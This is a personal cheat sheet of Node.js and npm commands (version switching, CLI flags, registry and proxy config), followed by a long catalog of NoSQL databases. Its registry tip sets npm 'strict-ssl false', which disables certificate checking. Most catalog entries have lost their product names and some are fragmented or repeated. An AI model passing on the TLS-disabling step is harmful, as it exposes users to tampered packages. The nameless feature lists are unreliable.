NodeJS cheat sheet

installation

tools

run different node version

run different node versions locally

sudo npm install -g n 
n ls
sudo n install 13.8
n exec 13.8 node --version
n exec 20.3 node --version
nvm install 12;
nvm use 12;
node -v

run node in docker, docker running, run node with version

node docker tags

# NODE_VERSION=16.15.0
NODE_VERSION=14.21.1-alpine
docker run --volume $PWD:/app -it node:$NODE_VERSION /bin/bash
cd /app
node --version

command line arguments

javascript REPL

node 

RUNNING YOUR CODE

# Evaluates the current argument as JavaScript
node --eval
# Checks the syntax of a script without executing it
node --check
# Opens the node.js REPL (Read-Eval-Print-Loop)
node --interactive
# Pre-loads a specic module at start-up
node --require
# Silences the deprecation warnings
node --no-deprecation
# Silences all warnings (including deprecations)
node --no-warnings
# Environment variable that you can use to set command line options
echo $NODE_OPTIONS

CODE HYGIENE

# Emits pending deprecation warnings
node --pending-deprecation
# Prints the stack trace for deprecations
node --trace-deprecation
Throws error on deprecation
node --throw-deprecation
Prints the stack trace for warnings
node --trace-warnings

INITIAL PROBLEM INVESTIGATION

# Generates node report on signal
node --report-on-signal
# Generates node report on fatal error
node --report-on-fatalerror
# Generates diagnostic report on uncaught exceptions
node --report-uncaught-exception

CONTROLLING/INVESTIGATING MEMORY USE

# Sets the size of the heap
--max-old-space-size
# Turns on gc logging
--trace_gc
# Enables heap proling
--heap-prof
# Generates heap snapshot on specied signal
--heapsnapshot-signal=signal

CPU PERFORMANCE INVESTIGATION

# Generates V8 proler output.
--prof
# Process V8 proler output generated using --prof
--prof-process
# Starts the V8 CPU proler on start up, and write the CPU prole to disk before exit
--cpu-prof

DEBUGGING

# Activates inspector on host:port and break at start of user script
--inspect-brk[=[host:]port]
# Activates inspector on host:port (default: 127.0.0.1:9229)
--inspect[=[host:]port]

npm

config

npm config ls
npm config list

npm registry

remove registry

npm config delete registry

set registry

# how to set registry
npm config set strict-ssl false
npm config set registry https://registry.npmjs.org/

or adjust environment

NPM_CONFIG_REGISTRY=https://registry.npmjs.org/

add additional registry

npm config set @my-personal-repo:registry https://ci.ubs.com/nexus/repository/cds-npm

or update your .npmrc

@my-personal-repo:registry=https://ci.ubs.com/nexus/repository/cds-npm
npm install @my-personal-repo/my-component

proxy

npm config set proxy [url:port]
npm config set https-proxy [url:port]

npm config get proxy
npm config get https-proxy

proxy in .npmrc

vim ~/.npmrc
proxy=http://user:[email protected]:8080/
https-proxy=http://user:[email protected]:8080/
;prefix=~/.npm-global

npm version

npm info coa
npm info coa versions

check installation

npm bin -g

package control

# best practice
# package-lock.json must have be present in root ( under git control )
npm ci

permission denied for folder /usr/lib

# create new folder where node will place all packages
mkdir ~/.npm-global

# Configure npm to use new folder
npm config set prefix '~/.npm-global'

# update your settings in ```vim ~/.profile```
export PATH=~/.npm-global/bin:$PATH

print high level packages

npm list -g --depth=0

reinstall package globally

npm search @angular

# full package name
npm uninstall -g @angular/cli
# uninstall by name 
# npm uninstall -g fx

npm cache clear --force
npm install -g @angular/cli 

show package version

npm show styled-components@* version

install package version

npm install [email protected]
# if you don't know certain version
npm install styled-components@^3.0.0

install with package registry

npm install [email protected] --registry=https://artifactory.ubs.net/artifactory/api/npm/external-npmjs-org/ --force

build project ( install dependencies )

npm install
npm start

start from different folder, start with special marker

npm start --prefix /path/to/api "special_app_marker_for_ps_aux"

start with different port

  • package.json solution
 "scripts": {"start": "PORT=3310 node ./bin/www"},
  • npm solution
PORT=$PORT npm --prefix $PROJECT_HOME/api start 
PORT=$PORT npm --prefix $PROJECT_HOME/api run start 

eject configuration to static files

npm run eject
# config/webpack.config.dev.js
# config/webpack.config.prod.js
# config/webpackDevServer.config.js
# config/env.js
# config/paths.js
# config/polyfills.js

yarn package manager

yarn config list

NextJS

npx create-next-app my-app

start nextjs

npm run-script build
npm run-script start
# or ( the same for debug )
node server.js

nextjs in real environment

nextjs-how-to

NoSQL

my own cheat-sheets

databases by types

scalable and ACID and (relational and/or sql -access)

Wide Column Store / Column Families

  • API: Java / any writer,
  • Protocol: any write call,
  • Query Method: MapReduce Java / any exec,
  • Replication: **HDFS
  • Replication**,
  • Written in: Java,
  • Concurrency: ?,
  • Misc: Links: 3 Books [1, 2, 3], Article >>

massively scalable, partitioned row store, masterless architecture, linear scale performance, no single points of failure, read/write support across multiple data centers & cloud availability zones. API /

  • Query Method: CQL and Thrift,
  • replication: peer-to-peer,
  • written in: Java,
  • Concurrency: tunable consistency,
  • Misc: built-in data compression, MapReduce support, primary/secondary indexes, security features.
  • Links:

Cassandra-compatible column store, with consistent low latency and more transactions per second. Designed with a thread-per-core model to maximize performance on modern multicore hardware. Predictable scaling. No garbage collection pauses, and faster compaction.

  • API: Thrift (Java, PHP, Perl, Python, Ruby, etc.),
  • Protocol: Thrift,
  • Query Method: HQL, native Thrift API,
  • Replication: HDFS Replication,
  • Concurrency: MVCC,
  • Consistency Model: Fully consistent
  • Misc: High performance C++ implementation of Google's Bigtable. » Commercial support

Accumulo is based on BigTable and is built on top of Hadoop, Zookeeper, and Thrift. It features improvements on the BigTable design in the form of cell-based access control, improved compression, and a server-side programming mechanism that can modify key/value pairs at various points in the data management process.

  • Misc: not open source / part of AWS, Book (will be outperformed by DynamoDB!)

Google's Big table clone like HBase. » Article

Column Store pioneer since 2002.

from LexisNexis, article

(formerly known as Stratosphere) massively parallel & flexible data analytics platform,

  • API: Java, Scala,
  • Query Method: expressive data flows (extended M/R, rich UDFs, iteration support),
  • Data Store: independent (e.g., HDFS, S3, MongoDB),
  • Written in: Java, License: Apache License V2.0,
  • Misc: good integration with Hadoop stack (HDFS, YARN), source code on Github

horizontally and vertically scalable, relational, partitioned row store, document store API /

  • Query Method: SQL (native, DRDA, JDBC, ODBC), MongoDB wire listener, mixed mode,
  • replication: master / slave, peer-to-peer, sharding, grid operations,
  • written in: C,
  • Concurrency: row, page, table, db locking,
  • Misc: ACID, built-in data compression, scheduler, automatic cyclic storage management, extensible, in memory acceleration, native ports from ARM v6 up
  • Links: Documentation, IIUG, Company.

Splice Machine is an RDBMS built on Hadoop, HBase and Derby. Scale real-time applications using commodity hardware without application rewrites, Features: ACID transactions, ANSI SQL support, ODBC/JDBC, distributed computing

massively scalable in-memory and persistent storage DBMS for analytics on market data (and other time series data). APIs: C/C++, Java Native Interface (JNI), C#/.NET), Python, SQL (native, ODBC, JDBC), Data layout: row, columnar, hybrid,

  • Written in: C,
  • Replication: master/slave, cluster, sharding,
  • Concurrency: Optimistic (MVCC) and pessimistic (locking)

a distributed self-tuning database with

  • automatic indexing
  • version control and ACID transactions.
  • Written In: Java. API/
  • Protocol: Thrift (many languages).
  • Concurrency: **serializable transactions with
  • just-in-time locking.
  • Misc: uses a buffered storage system to commit all data to disk immediately while perform rich indexing in the background.

open-source analytics

  • data store for business intelligence (OLAP) queries on event data. Low latency (real-time) data ingestion, flexible data exploration, fast data aggregation. Scaled to trillions of events & petabytes. Most commonly used to power user-facing analytic applications.
  • API: JSON over HTTP, APIs: Python, R, Javascript, Node, Clojure, Ruby, Typescript + support SQL queries
  • Written in: Java License: Apache 2.0
  • Replication: Master/Slave

Apache Kudu (incubating) completes Hadoop's storage layer to enable fast analytics on fast data.

Elassandra is a fork of Elasticsearch modified to run on top of Apache Cassandra in a scalable and resilient peer-to-peer architecture. Elasticsearch code is embedded in Cassanda nodes providing advanced search features on Cassandra tables and Cassandra serve as an Elasticsearch data and configuration store. [OpenNeptune, Qbase, KDI]

Document Store

  • API: REST and many languages,
  • Protocol: REST,
  • Query Method: via JSON,
  • Replication + Sharding: automatic and configurable,
  • written in: Java,
  • Misc: schema mapping, multi tenancy with arbitrary indexes, » Company and Support, » Article
  • API: BSON,
  • Protocol: C,
  • Query Method: dynamic object-based language & MapReduce,
  • Replication: Master Slave & Auto-Sharding,
  • Written in: C++,
  • Concurrency: Update in Place.
  • Misc: Indexing, GridFS, Freeware + Commercial License
  • Links: » Talk, » Notes, » Company

A fully managed Document store with multi-master replication across data centers. Originally part of Google App Engine, it also has REST and gRPC APIs. Now Firestore?!

is a fully managed, globally distributed NoSQL database perfect for the massive scale and low latency needs of modern applications. Guarantees: 99.99% availability, 99% of reads at <10ms and 99% of writes at <15ms. Scale to handle 10s-100s of millions of requests/sec and replicate globally with the click of a button. APIs: .NET, .NET Core, Java, Node.js, Python, REST. Query: SQL.

  • API: protobuf-based,
  • Query Method: unified chainable query language (incl. JOINs, sub-queries, MapReduce, GroupedMapReduce);
  • Replication: Sync and Async Master Slave with per-table acknowledgements, Sharding: guided range-based,
  • Written in: C++,
  • Concurrency: MVCC.
  • Misc: log-structured storage engine with concurrent incremental garbage compactor
  • API: Memcached API+protocol** (binary and ASCII) , most languages,
  • Protocol: Memcached REST interface for cluster conf + management,
  • Written in: C/C++ + Erlang (clustering),
  • Replication: Peer to Peer, fully consistent,
  • Misc: Transparent topology changes during operation, provides memcached-compatible caching buckets, commercially supported version available,
  • Links: » Wiki, » Article
  • API: MongoDB API and SQL,
  • Protocol: MongoDB Wire Protocol / MongoDB compatible,
  • Query Method: dynamic object-based language & SQL,
  • Replication: **RDBMS Backends'
  • Replication System & Support for
  • replication from MongoDB's Replica Set**,
  • Written in: Java,
  • Concurrency: MVCC.
  • Misc: Open Source NoSQL and SQL database. The agileness of a doc DB with the reliability and the native SQL capabilities of PostgreSQL.
  • API: BSON,
  • Protocol: C,
  • Query Method: dynamic object-based language,
  • Replication: Master Slave & Auto-Sharding,
  • Written in: C++,
  • Misc: Indexing, Large Object Store, Transaction, Free + Commercial License, Benchmark, Code

a 100% native .NET Open Source NoSQL Document Database (Apache 2.0 License).
It also supports SQL querying over JSON Documents.
Data can also be accessed through LINQ & ADO.NET.
NosDB also provides strong server-side and client-side caching features by integrating NCache.

.Net solution. Provides HTTP/JSON access. LINQ queries & Sharding supported.
Misc

(developer+commercial)

  • API: JSON, XML, Java
  • Protocols: HTTP, REST
  • Query Method: Full Text Search and Structured Query, XPath, XQuery, Range, Geospatial, Bitemporal
  • Written in: C++
  • Concurrency: Shared-nothing cluster, MVCC
  • Misc: Petabyte-scalable and elastic (on premise in the cloud), ACID + XA transactions, auto-sharding, failover, master slave
  • replication (clusters),
  • replication (within cluster), high availablity, disaster recovery, full and incremental backups, government grade security at the doc level, developer community »

(freeware+commercial)

  • API: XML, PHP, Java, .NET
  • Protocols: HTTP, REST, native TCP/IP
  • Query Method: full text search, XML, range and Xpath queries;
  • Written in C++
  • Concurrency: ACID-compliant, transactional, multi-master cluster
  • Misc: Petabyte-scalable document store and full text search engine. Information ranking.
  • Replication. Cloudable.

Object Document Mapper for JSON-Documents

  • written in pure JavaScript. It queries the collections with a gremlin-like DSL that uses MongoDB's API methods, but also provides joining. The collections extend the native array objects, which gives the overall ODM a good performance. Queries 500.000 elements in less then a second.

NoSQL database for Node.js in pure javascript. It implements the most commonly used subset of MongoDB's API and is quite fast (about 25,000 reads/s on a 10,000 documents collection with indexing).

  • API: Java & http,
  • Protocol: http, Language: Java, Querying: Range queries, Predicates,
  • Replication: Partitioned with consistent hashing, Consistency: Per-record strict consistency,
  • Misc: Based on Terracotta

Architected to unify the best of search engine, NoSQL and NewSQL DB technologies.

  • API: REST and many languages.
  • Query method: SQL.
  • Written in C++.
  • Concurrency: MVCC.
  • Misc: ACID transactions, data distribution via consistent hashing, static and dynamic schema support, in-memory processing. Freeware + Commercial License

Lightweight open source document database

  • written in Java for high performance, runs in-memory, supports Android.
  • API: JSON, Java
  • Query Method: REST OData Style Query language, Java fluent Query API
  • Concurrency: Atomic document writes Indexes: eventually consistent indexes

JSON based, Document store database with compiled .net map functions and automatic hybrid bitmap indexing and LINQ query filters

  • API: BSON,
  • Protocol: C++,
  • Query Method: dynamic queries and map/reduce, Drivers: Java, C++, PHP
  • Misc: ACID compliant, Full shell console over google v8 engine, djondb requirements are submited by users, not market. License: GPL and commercial

Embedded JSON database engine based on tokyocabinet.

  • API: C/C++, C# (.Net, Mono), Lua, Ruby, Python, Node.js binding,
  • Protocol: Native,
  • Written in: C, Query language: mongodb-like dynamic queries,
  • Concurrency: RW locking, transactional ,
  • Misc: Indexing, collection level rw locking, collection level transactions, collection joins., License: LGPL

DensoDB is a new NoSQL document database.

  • Written for .Net environment in c# language. It’s simple, fast and reliable. Source

A Document Store on top of SQL-Server.

For small online databases, PHP / JSON interface, implemented in PHP.

Node.js asynchronous NoSQL embedded database for small websites or projects. Database supports: insert, update, remove, drop and supports views (create, drop, read).

  • Written in JavaScript, no dependencies, implements small
  • concurrency model.

Uses Apache Thrift to integrate multiple backend databases as BerkeleyDB, Disk, MySQL, S3.

Transactional embedded database, it can embed into mobile, desktop and web applications, supports on-disk and in-memory storages.

  • API: Java,C# (Android, Mono, Xamarin, Unity3D).
  • Query Method: SQL-like and KeyValue.
  • Written In: Java, C#.
  • Replication: MasterSlave, MasterMaster.
  • API: Java/.NET.
  • Written in: Java.
  • Replication: Master/Slave. License: AGLP. Historical queries. ACID. Schemaless.
  • Concurrency: STM and persistent data structure. Append-only storage. Encrypted storage. Flexible durability control. Secondary & composite indexes. Transparently serializes Java/.NET objects.

100% JavaScript automatically synchronizing multi-model database with a SQL like syntax (JOQULAR) and swapable persistence stores. It supports joins, nested matches, projections or live object result sets, asynchronous cursors, streaming analytics, 18 built-in predicates, in-line predicates, predicate extensibility, indexable computed values, fully indexed Dates and Arrays, built in statistical sampling. Persistence engines include files, Redis, LocalStorage, block storage, and more.

Cloud based, open-source, zero-config. Based on CouchDB and BigCouch.

  • API: XQJ/XDM, REST, OpenAPI,
  • Protocols: Java, HTTP,
  • Query Method: distributed XQuery + server-side XQuery/Java extensions,
  • Written in: Java,
  • Concurrency: MVCC, Document format: XML, JSON, POJO, Avro, Protobuf, etc.
  • Misc: in-memory Data and Computation Grid, transparent
  • replication and fail-over, true horizontal scalability, ACID transactions, rich indexeng and trigger capabilities, plugable persistent store, plugable data formats. GitHub

Key Value / Tuple Store

Automatic ultra scalable NoSQL DB based on fast SSDs. Multiple Availability Zones. Elastic MapReduce Integration. Backup to S3 and much more...

Collections of free form entities (row key, partition key, timestamp). Blob and Queue Storage available, 3 times redundant. Accessible via REST or ATOM.

  • API: tons of languaes, JSON,
  • Protocol: REST,
  • Query Method: MapReduce term matching , Scaling: Multiple Masters;
  • Written in: Erlang,
  • Concurrency: eventually consistent (stronger then MVCC via Vector Clocks)
  • API: Tons of languages,
  • Written in: C,
  • Concurrency: in memory and saves asynchronous disk after a defined time. Append only mode available. Different kinds of fsync policies.
  • Replication: Master / Slave,
  • Misc: also lists, sets, sorted sets, hashes, queues. Cheat-Sheet: », great slides » Admin UI » From the Ground up »

Fast and web-scale database. RAM or SSD. Predictable performance; achieves 2.5 M TPS (reads and writes), 99% under 1 ms. Tunable consistency. Replicated, zero configuration, zero downtime, auto-clustering, rolling upgrades, Cross Datacenter

Fast & Batch updates. DB from Google.

  • API: C++.
  • Written in C++. Facebook`s improvements to Google`s LevelDB to speed throughput for datasets larger than RAM. Embedded solution.
  • API: Many languages,
  • Written in: C,
  • Replication: Master / Slave,
  • Concurrency: MVCC, License: Sleepycat, Berkeley DB Java Edition:
  • API: Java,
  • Written in: Java,
  • Replication: Master / Slave,
  • Concurrency: serializable transaction isolation, License: Sleepycat

Immediate consistency sharded KV store with an eventually consistent AP store bringing eventual consistency issues down to the theoretical minimum. It features efficient record coalescing. GenieDB speaks SQL and co-exists / do intertable joins with SQL RDBMs.

  • API: Get,Put,Delete,
  • Protocol: Native, HTTP, Flavor: Embedded, Network, Elastic Cache,
  • Replication: P2P based Network Overlay,
  • Written in: C++,
  • Concurrency: ?,
  • Misc: robust, crash proof, Elastic, throw machines to scale linearly, Btree/Ehash
  • API: Java & simple RPC to vals,
  • Protocol: internal,
  • Query Method: M/R inside value objects, Scaling: every node is master for its slice of namespace,
  • Written in: Java,
  • Concurrency: serializable transaction isolation,
  • Written in: Erlang,
  • Replication: Strong consistency over replicas,
  • Concurrency: non blocking Paxos.
  • Links:
    • nice talk »,
    • slides »,
  • Protocol: http (text, html, JSON), C, C++, Python, Java, Ruby, PHP,Perl.
  • Concurrency: Paxos.

Open-Source implementation of Amazons Dynamo Key-Value Store.

Open-Source implementation of Amazons Dynamo Key-Value Store.

  • written in Erlang. With "data partitioning, versioning, and read repair, and user-provided storage engines provide persistence and query processing".

Open Source Amazon Dnamo implementation,

  • API: Memcache protocol (get, set, add, replace, etc.),
  • Written in: C, Data Model: Blob,
  • Misc: Is Memcached writing to BerkleyDB.
  • API: C, C++, C#, Java, PHP, Perl,
  • Written in: C,C++.
  • Misc: Transaction logging. Client/server. Embedded. SQL wrapper (not core). Been around since 1979.

Key-Value database that was written as part of SQLite4,
They claim it is faster then LevelDB.
Instead of supporting custom comparators, they have a recommended data encoding for keys that allows various data types to be sorted.

A fast, efficient on-disk

  • data store for Windows Phone 8, Windows RT, Win32 (x86 & x64) and .NET. Provides for key-value and multiple segmented key access. APIs for C#, VB, C++, C and HTML5/JavaScript.
  • Written in pure C for high performance and low footprint. Supports async and synchronous operations with 2GB max record size.

embedded solution

  • API: C, C++, .NET, Java, Erlang.
  • Written in C,C++. Fast key/value store with a parameterized B+-tree. Keys are "typed" (i.e. 32bit integers, floats, variable length or fixed length binary data). Has built-in analytical functions like SUM, AVERAGE etc.
  • API: C#,
  • Written in C#, embedded solution, generic XTable<TKey,TRecord> implementation, ACID transactions, snapshots, table versions, shared records, vertical data compression, custom compression, composite & custom primary keys, available backend file system layer, works over multiple volumes, petabyte scalability, LINQ.
  • API: C, Perl, PHP, Python, Java and Ruby.
  • Written in: Objective C ,
  • Protocol: asynchronous binary, memcached, text (Lua console). Data model: collections of dimensionless tuples, indexed using primary + secondary keys.
  • Concurrency: lock-free in memory, consistent with disk (write ahead log).
  • Replication: master/slave, configurable. Other: call Lua stored procedures.

In-memory (opt. persistence via mmap), highly concurrent, low-latency key-value store.

  • API: Java.
  • Written in: Java.
  • Protocol: in-process Java, remote via Chronicle Engine + Wire: binary, text, Java, C# bindnings.
  • Concurrency: in-memory lock striping, read-write locks.
  • Replication: multi-master, eventually consistent.
  • API: C,
  • Query Method: MQL, native API,
  • Replication: **DFS
  • Replication**, Consistency: strict consistency
  • Written in: C.

For geolocalized apps.

  • Concurrency: in-memory with asynchronous disk writes.
  • API: HTTP/JSON.
  • Written in: C. License: BSD.

A pure key value store with optimized b+tree and murmur hashing. (In the near future it will be a JSON document database much like mongodb and couchdb.)

peer-to-peer distributed in-memory (with persistence) datagrid that implements and expands on the concept of the Tuple Space. Has SQL Queries and ACID (=> NewSQL).

Key-Value concept. Variable number of keys per record. Multiple key values, Hierarchic records. Relationships. Diff. record types in same DB. Indexing: B*-Tree. All aspects configurable. Full scripting language. Multi-user ACID. Web interfaces (PHP, Perl, ActionScript) plus Windows client.

A fast key-value Database (using LSM-Tree storage engine),

  • API: Redis protocol (SET,MSET,GET,MGET,DEL etc.),
  • Written in: ANSI C

Distributed searchable key-value store. Fast (latency & throughput), scalable, consistent, fault tolerance, using hyperscpace hashing. APIs for C, C++ and Python.

Fast, open source, shared memory (using memory mapped files e.g. in /dev/shm or on SSD), multi process, hash table, e.g. on an 8 core i7-3720QM CPU @ 2.60GHz using /dev/shm, 8 processes combined have a 12.2 million / 2.5 to 5.9 million TPS read/write using small binary keys to a hash filecontaining 50 million keys. Uses sharding internally to mitigate lock contention.

  • Written in C.

Ultra-fast, ultra-compact key-value embedded

  • data store developed by Symas for the OpenLDAP Project. It uses memory-mapped files, so it has the read performance of a pure in-memory database while still offering the persistence of standard disk-based databases, and is only limited to the size of the virtual address space, (it is not limited to the size of physical RAM)

Sophia is a modern embeddable key-value database designed for a high load environment. It has unique architecture that was created as a result of research and rethinking of primary algorithmical constraints, associated with a getting popular Log-file based data structures, such as LSM-tree. Implemented as a small C-

  • written, BSD-licensed library.

.NET Open Source Distributed Cache.

  • Written in C#. API .NET & Java. Query Parallel SQL Query, LINQ & Tags.
  • Misc: Linear Scalability, High Availability, WAN
  • Replication, GUI based Administration & Monitoring Tools, Messaging, Runtime Data Sharing, Cache & Item Level Events, Continuous Query & Custom Events, DB Dependencies & Expirations

Open Source In-Memory JCache compliant Data Grid.

  • Written in Java. API Java, JCache JSR 107 & .NET. Query SQL & DB Synchronization.
  • Misc: Linear Scalability, High Availability, WAN
  • Replication, GUI based Administration & Monitoring Tools, Distributed Messaging, MapReduce, Entry Processor and Aggregator

Redis inspired K/V store for Python object serialization.

(ErlangDB »)

(based on Tokyo Tyrant)

Hibari is a highly available, strongly consistent, durable, distributed key-value

  • data store

Key-value store, B+tree. Lightning fast reads+fast bulk loads. Memory-mapped files for persistent storage with all the speed of an in-memory database. No tuning conf required. Full ACID support. MVCC, readers run lockless. Tiny code,

  • written in C, compiles to under 32KB of x86-64 object code. Modeled after the BerkeleyDB API for easy migration from Berkeley-based code. Benchmarks against LevelDB, Kyoto Cabinet, SQLite3, and BerkeleyDB are available, plus full paper and presentation slides.

High availability,

  • concurrency-oriented event-based K/V database with transactions and causal consistency.
  • Protocol: MsgPack,
  • API: Erlang, Elixir, Node.js.
  • Written in: Elixir, Github-Repo.

BinaryRage is designed to be a lightweight ultra fast key/value store for .NET with no dependencies. Tested with more than 200,000 complex objects

  • written to disk per second on a crappy laptop :-) No configuration, no strange driver/connector, no server, no setup - simply reference the dll and start using it in less than a minute.

Github Page »

Professional, open-source, NoSql (embedded Key/Value storage), transactional, ACID-compliant, multi-threaded, object database management system for .NET 3.0> MONO.

  • Written in C#.
  • API: Scala.
  • Written in Scala.
  • Replication: Replicas vote on writes and reads. Sharding: Hashes keys onto array of replica cohorts.
  • Concurrency: **Optimistic + Multiversion
  • Concurrency Control. Provides multirow atomic writes. Exposes optimistic
  • concurrency through API to support HTTP Etags.** Embedded solution.

Key/Value DB

  • written in Go.

Serenity database implements basic Redis commands and extends them with support of Consistent Cursors, ACID transactions, Stored procedures, etc. The database is designed to store data bigger then available RAM.

  • API: Memcached.
  • Written in C++. In-memory LRU cache with very small memory footprint. Works within fixed amount of memory. Cachelot has a C++ cache library and stand-alone server on top of it.

Use a JSON encoded file to automatically save a JavaScript value to disk whenever that value changes. A value can be a Javascript: string, number, boolean, null, object, or an array. The value can be structured in an array or an object to allow for more complex

  • data stores. These structures can also be nested. As a result, you can use this module as a simple document store for storing semistructured data.

InfinityDB is an all-Java embedded DBMS with access like java.util.concurrent.ConcurrentNavigableMap over a tuple space, enhanced for nested Maps, LOBs, huge sparse arrays, wide tables with no size constraints. Transactions, compression, multi-core

  • concurrency, easy schema evolution. Avoid the text/binary trap: strongly-typed, fine-grained access to big structures. 1M ops/sec. Commercial, closed source, patented.

Key Value Store with scripting language. Data types include list, dictionary and set. Hierarchical keys.

  • API: TCP/IP,
  • Protocol: Query language,
  • Written in: Delphi, License: MIT,
  • Links: Github

In-Memory, scale-by-cell division (under load), multi-tiered scalability (transactions, entries, indicies), read=write, geo-redundancy, redundancy per datatype, LDAP, API, bulkload facility for VNF state resiliency, VNF-M integratable, self-[re-]balancing, Backend for Mobile Network Functions

The C/C++ persistent key/value storage engine based on skip list data structure.

  • API: C/C++.
  • Protocol: Native. Writen in: C11,
  • Concurrency: RW locking. License: MIT

A distributed

  • data store for multi-dimensional data. BBoxDB enhances the key-value data model by a bounding box, which describes the location of a value in an n-dimensional space. Data can be efficiently retrieved using hyperrectangle queries. Spatial joins and dynamic data redistribution are also supported.
  • API: Java,
  • Protocol: asynchronous binary, Data model: Key-bounding-box-value, Scaling: **Auto-Sharding,
  • Replication**,
  • Written in: Java,
  • Concurrency: eventually consistent / RW locking

A HTTP based, user facing, RESTful NoSQL cache server based on HAProxy. It can be used as an internal NoSQL cache sits between your application and database like Memcached or Redis as well as a user facing NoSQL cache that sits between end user and your application. It supports headers, cookies, so you can store per-user data to same endpoint.

  • Protocol: HTTP. Writen in: C.

A lightweight in-memory document-oriented database

  • written with JavaScript.
  • Includes Single Page Application API,
  • node serialization,
  • tree browsing and CRUD operations on document tuples through web GUI.
  • Integrate with server-side noSQL database instance into a transaction-synchronous cluster,
  • create SPA content or browse and serialize document tuples with HTML interface.

? SubRecord

? Mo8onDb

? Dovetaildb

Graph Databases

  • API: lots of langs,
  • Protocol: Java embedded / REST,
  • Query Method: SparQL, nativeJavaAPI, JRuby,
  • Replication: typical MySQL style master/slave,
  • Written in: Java,
  • Concurrency: non-block reads, writes locks involved nodes/relationships until commit,
  • Misc: ACID possible,
  • Links: Video », Blog »
  • API: Java,
  • Protocol: Direct Language Binding,
  • Query Method: Graph Navigation API, Predicate Language Qualification,
  • Written in: Java (Core C++), Data Model: Labeled Directed Multi Graph,
  • Concurrency: Update locking on subgraphs, concurrent non-blocking ingest,
  • Misc: Free for Qualified Startups.
  • API: Java, .NET, C++, Python, Objective-C, Blueprints Interface
  • Protocol: Embedded,
  • Query Method: as above + Gremlin (via Blueprints),
  • Written in: C++, Data Model: Labeled Directed Attributed Multigraph,
  • Concurrency: yes,
  • Misc: ACID possible, Free community edition up to 1 Mio objects,
  • Links: Intro », Technical Overview »
  • API: Java, Blueprints, Gremlin, Python, Clojure
  • Protocol: Thrift, RexPro(Binary), Rexster (HTTP/REST)
  • Query Method: Gremlin, SPARQL
  • Written In: Java Data Model: labeled Property Graph, directed, multi-graph adjacency list
  • Concurrency: ACID Tunable C
  • Replication: Multi-Master License: Apache 2 Pluggable backends: Cassandra, HBase, MapR M7 Tables, BDB, Persistit, Hazelcast
  • Links: Titan User Group
  • API: Java, http/REST,
  • Protocol: as API + XPRISO, OpenID, RSS, Atom, JSON, Java embedded,
  • Query Method: Web user interface with html, RSS, Atom, JSON output, Java native,
  • Replication: peer-to-peer,
  • Written in: Java,
  • Concurrency: concurrent reads, write lock within one MeshBase,
  • Misc: Presentation »
  • API: Java (and Java Langs),
  • Written in:Java,
  • Query Method: Java or P2P,
  • Replication: P2P,
  • Concurrency: STM,
  • Misc: Open-Source, Especially for AI and Semantic Web.

Sub-graph-based API, query language, tools & transactions.
Embedded Java, remote-proxy Java or REST.
Distributed storage & processing. Read/write all Nodes. Permissions & Constraints frameworks. Object storage, vertex-embedded agents. Supports multiple graph models.

  • Written in Java
  • API: C#,
  • Protocol: C# Language Binding,
  • Query Method: Graph Navigation API,
  • Replication: P2P with Master Node,
  • Written in: C#,
  • Concurrency: Yes (Transactional update in online query mode, Non-blocking read in Batch Mode)
  • Misc: distributed in-memory storage, parallel graph computation platform (Microsoft Research Project)
  • API: Java, Python, Ruby, C#, Perl, Clojure, Lisp
  • Protocol: REST,
  • Query Method: SPARQL and Prolog, Libraries: Social Networking Analytics & GeoSpatial,
  • Written in: Common Lisp,
  • Links: Learning Center », Videos »

A native, .NET, semantic web database with code first Entity Framework, LINQ and OData support.

  • API: C#,
  • Protocol: SPARQL HTTP, C#,
  • Query Method: LINQ, SPARQL,
  • Written in: C#
  • API: Java, Jini service discovery,
  • Concurrency: very high (MVCC),
  • Written in: Java,
  • Misc: GPL + commercial, Data: RDF data with inference, dynamic key-range sharding of indices,
  • Misc: Blog » (parallel database, high-availability architecture, immortal database with historical views)

RDF enterprise database management system. It is cross-platform and can be used with most programming languages. Main features: high performance, guarantee database transactions with ACID, secure with ACL's, SPARQL & SPARUL, ODBC & JDBC drivers, RDF & RDFS. »

WhiteDB is a fast lightweight graph/N-tuples shared memory database library

  • written in C with focus on speed, portability and ease of use. Both for Linux and Windows, dual licenced with GPLv3 and a free nonrestrictive royalty-free commercial licence.

Graph/ORM high throughput database built in Java supports embedded, in-memory, and remote. Horizontal scalability through sharding, partitioning,

  • replication, and disaster recovery
  • API: Java, REST via (Objective C, Android, etc...),
  • Protocol: Java embedded/Binary Socket/REST,
  • Query Method: Persistence Manager/ORM,
  • Replication: Multicast,
  • Written in: Java,
  • Concurrency: Re-entrant read/write,
  • Misc: Free and Open Source. Commercial licensing available

Hybrid DBMS covering the following models: Relational, Document, Graph

scalable, fast, consistent

Github

? OpenRDF / Sesame

? Filament

? OWLim

? NetworkX

? iGraph

? Jena

Multimodel Databases

  • API: REST, Graph Blueprints, C#, D, Ruby, Python, Java, PHP, Go, Python, etc. Data Model: Documents, Graphs and Key/Values.
  • Protocol: HTTP using JSON.
  • Query Method: declarative query language (AQL), query by example.
  • Replication: master-slave (m-m to follow), Sharding: automatic and configurable
  • Written in: C/C++/Javascript (V8 integrated),
  • Concurrency: MVCC, tuneable
  • Misc: ACID transactions, microservices framework "Foxx" (Javascript), many indices as secondary, fulltext, geo, hash, Skip-list, capped collections
  • API: REST, Binary Protocol, Java, Node.js, Tinkerpop Blueprints, Python, PHP, Go, Elixir, etc., Schema: Has features of an Object-Database, DocumentDB, GraphDB and Key-Value DB,
  • Written in: Java,
  • Query Method: SQL, Gremlin, SparQL,
  • Concurrency: MVCC, tuneable, Indexing: Primary, Secondary, Composite indexes with support for Full-Text and Spatial,
  • Replication: Master-Masterfathomdb + sharding,
  • Misc: Really fast, Lightweight, ACID with recovery.

Bought by Apple Inc. Closed and reopened for public access.

  • API: Many jvm languages,
  • Protocol: Native + REST,
  • Query Method: Datalog + custom extensions, Scaling: elastic via underlying DB (in-mem, DynamoDB, Riak, CouchBase, Infinispan, more to come),
  • Written in: Clojure,
  • Concurrency: ACID
  • MISC: smart caching, unlimited read scalability, full-text search, cardinality, bi-directional refs 4 graph traversal, loves Clojure + Storm.
  • API: JavaScript Schema: Has features of an Object-Database, DocumentDB, GraphDB and Key-Value DB
  • Written in: JavaScript
  • Query Method: JavaScript
  • Concurrency: Eventual consistency with hybrid vector/timestamp/lexical conflict resolution Indexing: O(1) key/value, supports multiple indices per record
  • Replication: Multi-Master/Master; browser peer-to-peer (P2P) enabled
  • Misc: Open source, realtime sync, offline-first, distributed/decentralized, graph-oriented, and fault-tolerant

